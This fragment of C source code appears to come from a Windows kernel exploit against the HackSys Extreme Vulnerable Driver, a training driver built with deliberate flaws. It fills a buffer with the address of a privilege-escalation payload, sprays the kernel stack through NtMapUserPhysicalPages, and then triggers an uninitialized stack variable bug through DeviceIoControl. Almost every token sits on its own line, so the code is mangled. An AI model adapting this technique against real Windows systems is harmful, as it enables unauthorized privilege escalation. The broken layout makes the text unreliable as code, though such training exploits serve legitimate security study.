__try {
/
/
Get the device handle
DEBUG_MESSAGE(
"\t[+] Getting Device Driver Handle\n"
);
DEBUG_INFO(
"\t\t[+] Device Name: %s\n"
, FileName);
hFile
=
GetDeviceHandle(FileName);
if
(hFile
=
=
INVALID_HANDLE_VALUE) {
DEBUG_ERROR(
"\t\t[-] Failed Getting Device Handle: 0x%X\n"
, GetLastError());
exit(EXIT_FAILURE);
}
else
{
DEBUG_INFO(
"\t\t[+] Device Handle: 0x%X\n"
, hFile);
}
DEBUG_MESSAGE(
"\t[+] Setting Up Vulnerability Stage\n"
);
DEBUG_INFO(
"\t\t[+] Allocating Memory For Buffer\n"
);
StackSprayBuffer
=
(PULONG)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
StackSprayBufferSize);
if
(!StackSprayBuffer) {
DEBUG_ERROR(
"\t\t\t[-] Failed To Allocate Memory: 0x%X\n"
, GetLastError());
exit(EXIT_FAILURE);
}
else
{
DEBUG_INFO(
"\t\t\t[+] Memory Allocated: 0x%p\n"
, StackSprayBuffer);
DEBUG_INFO(
"\t\t\t[+] Allocation Size: 0x%X\n"
, StackSprayBufferSize);
}
DEBUG_INFO(
"\t\t[+] Preparing Buffer Memory Layout\n"
);
for
(i
=
0
; i < StackSprayBufferSize
/
sizeof(ULONG_PTR); i
+
+
) {
StackSprayBuffer[i]
=
(ULONG)EopPayload;
}
DEBUG_INFO(
"\t\t[+] EoP Payload: 0x%p\n"
, EopPayload);
ResolveKernelAPIs();
DEBUG_INFO(
"\t\t[+] Spraying the Kernel Stack\n"
);
DEBUG_MESSAGE(
"\t[+] Triggering Use of Uninitialized Stack Variable\n"
);
OutputDebugString(
"****************Kernel Mode****************\n"
);
/
/
HackSys Extreme Vulnerable driver itself provides a decent interface
/
/
to spray the stack using Stack Overflow vulnerability. However, j00ru
/
/
on his blog disclosed a Windows API that can be used to spray stack up to
/
/
1024
*
sizeof(ULONG_PTR) bytes (http:
/
/
j00ru.vexillium.org
/
?p
=
769
). Since,
/
/
it's a Windows API
and
available on Windows by default, I decided to use
/
/
it instead of this driver's Stack Overflow interface.
NtMapUserPhysicalPages(NULL,
1024
, StackSprayBuffer);
/
/
Kernel Stack should
not
be used
for
anything
else
as it
/
/
will corrupt the current sprayed state. So, we will directly
/
/
trigger the vulnerability without putting
any
Debug prints.
DeviceIoControl(hFile,
HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE,
(LPVOID)&MagicValue,
0
,
NULL,
0
,
&BytesReturned,
NULL);
OutputDebugString(
"****************Kernel Mode****************\n"
);
HeapFree(GetProcessHeap(),
0
, (LPVOID)StackSprayBuffer);
StackSprayBuffer
=
NULL;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
DEBUG_ERROR(
"\t\t[-] Exception: 0x%X\n"
, GetLastError());
exit(EXIT_FAILURE);
}